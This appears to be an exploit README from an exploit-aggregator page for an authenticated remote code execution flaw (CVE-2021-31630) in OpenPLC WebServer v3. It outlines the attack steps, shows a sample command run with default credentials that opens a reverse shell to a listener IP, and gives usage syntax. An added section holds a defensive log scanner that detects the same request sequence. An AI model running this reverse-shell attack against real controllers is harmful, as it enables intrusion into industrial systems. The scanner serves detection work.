## https://sploitus.com/exploit?id=872648BF-E458-5561-8C1C-2780950110B3
# OpenPLC WebServer v3 - Authenticated RCE (CVE-2021-31630)
---
This exploit is based on the exploit from [Exploit-DB](https://www.exploit-db.com/exploits/49803) made by [Fellipe Oliveira](https://www.exploit-db.com/?author=11060).
The exploit performs these steps:
- Authenticate
- Upload a malicious C file
- Compile it
- Start the PLC (this initiates the reverse shell)
- Stop the PLC (no need to keep it running; the reverse shell is already initiated)
```
└─# python3 custom_exploit.py --url http://10.10.11.7:8080 --username openplc --password openplc --listenerip 10.10.16.4 --listenerport 8888
[*] Authenticated.
[*] C file uploaded. Waiting for compilation.
[*] Compiled, probably.
[*] Started PLC, you should get your reverse shell now.
[*] Stopped PLC.
```
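
A defender-side view of the five-step sequence above, as an added example that is not part of the original README or the exploit: it scans web access logs for a single client walking through login, upload, compile, start and stop in order within a short window. The route names, the 120-second window and the common-log-format input are assumptions, and the sample traffic is constructed.

```python
import re
from datetime import datetime, timedelta

# Assumed (method, route prefix) per step; confirm against your OpenPLC install.
STAGES = [("POST", "/login"), ("POST", "/hardware"), ("GET", "/compile-program"),
          ("GET", "/start_plc"), ("GET", "/stop_plc")]
WINDOW = timedelta(seconds=120)  # assumed: a scripted run finishes within this
LINE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                  r'"(?P<method>[A-Z]+) (?P<path>\S+)')

def parse(line):
    """Return (client, time, method, path without query) or None."""
    m = LINE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"].split("?")[0]

def find_chains(lines, window=WINDOW):
    """Return (client, start, end) for every full in-order chain within window."""
    progress, hits = {}, []   # client -> (next stage index, time chain began)
    for ip, ts, method, path in filter(None, map(parse, lines)):
        idx, began = progress.get(ip, (0, None))
        if idx and ts - began > window:
            idx, began = 0, None              # stale partial chain: start over
        want_method, want_path = STAGES[idx]
        if method == want_method and path.startswith(want_path):
            began, idx = began or ts, idx + 1
            if idx == len(STAGES):            # all five steps seen in order
                hits.append((ip, began, ts))
                idx, began = 0, None
        progress[ip] = (idx, began)
    return hits

def log_line(ip, hms, req):  # builds one constructed common-log-format line
    return f'{ip} - - [12/Mar/2024:{hms} +0000] "{req} HTTP/1.1" 302 0'

SAMPLE = [  # constructed traffic, documentation-range addresses
    log_line("192.0.2.10", "10:00:01", "POST /login"),
    log_line("198.51.100.7", "10:00:02", "POST /login"),   # operator, manual use
    log_line("192.0.2.10", "10:00:02", "POST /hardware"),
    log_line("192.0.2.10", "10:00:03", "GET /compile-program?file=x.st"),
    log_line("192.0.2.10", "10:00:09", "GET /start_plc"),
    log_line("192.0.2.10", "10:00:10", "GET /stop_plc"),
    log_line("198.51.100.7", "10:00:30", "GET /start_plc"),
]

if __name__ == "__main__":
    print(find_chains(SAMPLE))
```

The operator at 198.51.100.7, who only logs in and starts the PLC, is not reported; only the client that completes the whole chain inside the window is.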
## How to use
```
python3 exploit.py --url <> --username <> --password <> --listenerip <> --listenerport <>
```
Options:
- `--url` - URL of the OpenPLC
- `--username` - username
- `--password` - password
- `--listenerip` - IP address of the listener
- `--listenerport` - port of the listener
> **_NOTE:_** This exploit is created as a PoC; use it only for educational purposes or CTFs - https://flojboj.org/article/WifineticTwo